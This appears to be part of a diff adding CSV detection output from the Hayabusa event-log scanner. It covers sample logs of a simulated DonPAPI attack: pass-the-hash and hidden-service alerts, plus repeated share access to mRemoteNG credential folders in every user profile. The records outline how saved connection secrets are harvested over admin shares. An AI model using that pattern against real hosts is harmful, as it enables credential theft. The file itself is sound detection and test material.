+2021-12-12 16:16:04.884 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724e0b | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724ead,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724ead,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724ead,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x8724ead,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.946 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724ead | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.982 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.076 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.076 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.076 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.076 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.076 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
